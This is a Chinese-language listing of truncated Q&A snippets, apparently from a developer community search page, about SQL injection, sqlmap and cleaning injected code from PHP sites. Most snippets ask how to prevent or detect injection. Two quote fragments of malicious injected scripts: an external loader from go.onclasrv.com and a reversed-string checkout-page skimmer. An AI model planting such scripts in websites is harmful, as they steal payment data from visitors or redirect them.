1回答
所以我下载Pythonver2.7和sqlmap来尝试注入我的网站(.php)。
我在网上搜索教程,并使用这个命令"sqlmap.py -u“链接获取结构。我的问题是,在教程中的链接末尾有一个".php?id=1”,他们通过搜索在Google中找到了id。但是我的服务器是xampp,我也不能在Google中搜索。那么"id=“是什么意思?还有,还有注入和获取该网站所有数据库的问题吗?因为我输入了sqlmap.py -u "http
浏览 0提问于2017-04-20得票数 1
回答已采纳
我有一个站点,一些代码被注入到非常多的php文件中,由于文件的数量,手动删除它们是不可行的。我可以在所有文件中从注入的代码中搜索变量名,它给出了受影响代码的列表,但是我不能将实际的代码放在搜索中,因为它包含双引号、单引号和所有类型的字符。下面是我用来搜索的东西:有没有任何方法搜索整个php函数/注入的代码并删除?请注意,我对linux非常陌生。
浏览 0提问于2016-07-11得票数 0
这应该不是一个不寻常的问题,但是处理PDO & php所有三个安全因素的交集的文档要么很难找到,要么根本不存在。我的需求相对简单和标准,按优先顺序排列:
目前,我有以下声明:
select * from users它执行正确的
浏览 4提问于2012-12-28得票数 1
我需要做一个关于webapplication上的代码注入和如何防止它的演示文稿。我对.net不是很熟悉,我主要了解SQL或php上的代码注入。阅读和搜索网页似乎java,.net和php代码注入在php中最简单,然后是java (动态加载脚本),但在.net中我发现没有那么多或那么好的文档。有没有可能在.net中有一个(简单的)代码注入的例子,以及如何防止它。此外,任何链接到代码注入的java或php也将是伟大的,你
浏览 2提问于2012-07-02得票数 1
我正在使用jQuery和PHP进行实时搜索,但我不确定我的查询是否容易受到SQL注入的攻击。这是否容易受到SQL注入的影响
浏览 1提问于2011-09-06得票数 1
回答已采纳
5回答
有没有办法找到SQL注入漏洞?
注意:我正在询问如何在您控制的服务器上找到它们,以便您可以修复它们。我不是在问如何在别人的服务器上检测它们来利用它们。
浏览 1提问于2010-09-03得票数 6
回答已采纳
1回答
我有一个关于PHP/MySql搜索表单的最佳实践的问题
</form>
表单通过GET发送到search.php?在那里之后,PHP文件
浏览 3提问于2013-04-07得票数 0
回答已采纳
我对sql注入知之甚少。例如,我应该如何在数据库中插入数据,如何从数据库中提取数据,如何在mysql中执行搜索查询、更新查询。到目前为止,我知道addslashes是用来防止使用php的mysql中的sql注入的。你能告诉我如何预防这种情况吗?
浏览 0提问于2010-01-21得票数 1
回答已采纳
我在我的电子商务网站上记录了搜索词,然后我输入了经常出现。马上让我担心的是,可能有某种自动机器人在寻找漏洞?也许是SQL注入?
有人能解释一下人们正在尝试做什么吗?
浏览 4提问于2011-08-13得票数 1
回答已采纳
2回答
我有一个PHP脚本,它使用mysqli使用一个非常简单的搜索语句。以下是声明:现在我想防止SQL注入,但我无法理解语法。
我试过LIKE '%?防止注入的SQL语句的正确语法是什么?
浏览 2提问于2014-07-21得票数 0
回答已采纳
1回答
好的,我昨天有一个电话面试,他们告诉我准备一个面对面的面试,并让我学习一些叫做PHP PDL的东西。当我在谷歌上搜索PHP PDL时,似乎什么都没有出现,我的手机由于某种原因没有保存号码以回拨他们。所以现在离面试还有一天,我想知道要准备什么,我确实知道PHP,但什么是PDL,他们提到了一些关于SQL注入和准备好的语句,PDL是使用它的好方法。同样,它与PHP相关,并且与SQL注入和使用预准备语句预防SQL注入有一定的联系。
谢谢
浏览 2提问于2012-07-26得票数 0
回答已采纳
1回答
我的网站需要超过30秒才能完全加载,因为有一个名为"json.gdn/gpl“的文件。我完全不知道如何解决这个问题。我在上发现了这个问题。提前谢谢你!
浏览 5提问于2018-07-20得票数 0
1回答
我有一个简单的模型搜索,它通过GoogleCustomSearch使用应用程序组件GoogleCustomSearch进行搜索。GoogleCustomSearch必须配置Google键和搜索引擎ID,我通过应用程序配置配置/web.php指定Google键和搜索引擎ID。我想将配置的 GoogleCustomSearch实例注入到搜索模型的实例中。是否有可能以一种更清洁的方式达到我的目标(下面是解决办法)?/config/bootstra
浏览 2提问于2016-09-10得票数 3
2回答
我刚刚偶然发现了一个易受SQL错误注入攻击的网站( )。/login.php / asp url一个搜索表在尝试注入一些SQL时出现一些假SQL错误。
有没有人有更多/更好的建议/想法/任何东西来设置SQL注入的蜜罐?
浏览 1提问于2011-05-31得票数 1
回答已采纳
我不知道从哪里开始。最近,使用 CMS系统编写的Concrete5已经开始出现以下内容:
要运行此应用程序吗?地点:
浏览 4提问于2013-05-31得票数 0
回答已采纳
is_single())
';
{
<script type="text/javascript" src="//go.onclasrv.com/apu.<em
浏览 0提问于2018-10-19得票数 1
回答已采纳
我有一个恶意脚本,它被插入到body标记之后,我不知道应该检查哪个文件来删除它,我已经检查了管理文件和模板文件中的任何地方,而且这里找不到它。病毒看起来是这样的:RegExp('onepage|checkout|onestep|firecheckout')).test(window.location)) knil//:sptth"=crs tpircs<'.split("")
浏览 3提问于2017-07-15得票数 0
可能重复:
<form role="search" method="get" action="http://chusmix.com/" onsubmit="if (document.getElementById我对PHP知之甚少,但如果你需要任何信息,请问我,如果可能的话,告诉我从哪里得到它。
浏览 4提问于2010-12-19得票数 0
回答已采纳
云服务器
ICP备案
对象存储
腾讯会议
实时音视频
腾讯云开发者
